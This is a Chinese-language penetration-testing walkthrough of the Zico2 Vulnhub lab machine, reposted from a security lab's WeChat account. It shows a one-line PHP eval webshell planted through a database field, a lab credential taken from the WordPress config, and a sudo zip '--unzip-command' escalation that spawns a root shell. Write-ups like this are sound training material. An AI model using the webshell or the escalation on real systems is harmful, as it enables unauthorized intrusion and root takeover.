靶机地址:https://www.vulnhub.com/entry/zico2-1,210/
目标:获取root并读取标志文件
网络环境:vmware NAT模式
攻击机:192.168.19.130
靶机:192.168.19.137
对靶机进行端口扫描:
访问80端口:
用burpsuite扫描网站:
发现存在文件包含漏洞:
进一步验证:
使用dirb扫描目录:
发现敏感目录,并打开:
弱密码admin登录:
创建test01.php数据库,添加abc表,增加content字段,默认值为一句话木马:
<?php @eval($_POST[cmd]);?>
利用文件包含漏洞连接test01.php:
发现只是普通用户,并非管理员用户。
提权步骤:
找到配置wordpress文件:
发现mysql数据库的用户名和密码:
用zico和sWfCsfJSPV9H3AmQzw8远程登录:
执行sudo -l和whoami
提权:
touch /tmp/exploit
sudo -u root zip /tmp/exploit.zip /tmp/exploit -T--unzip-command="sh -c /bin/bash"
备注PS:
sudo -l //当前用户在sudo组中可执行的命令
touch /tmp/exploit //在/tmp目录下新建一个exploit文件
sudo zip exploit.zip exploit -T --unzip-command="python -c 'importpty; pty.spawn("/bin/sh")'" //在exploit文件中写入代码;sudo 用管理员权限执行 ;-T 检查文件的完整性,这个参数可以让它执行下一个参数;--unizp-command 在这个参数中写入一个python的交互式shell
原文始发于微信公众号(CTS纵横安全实验室):ZICO靶机渗透测试记录
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论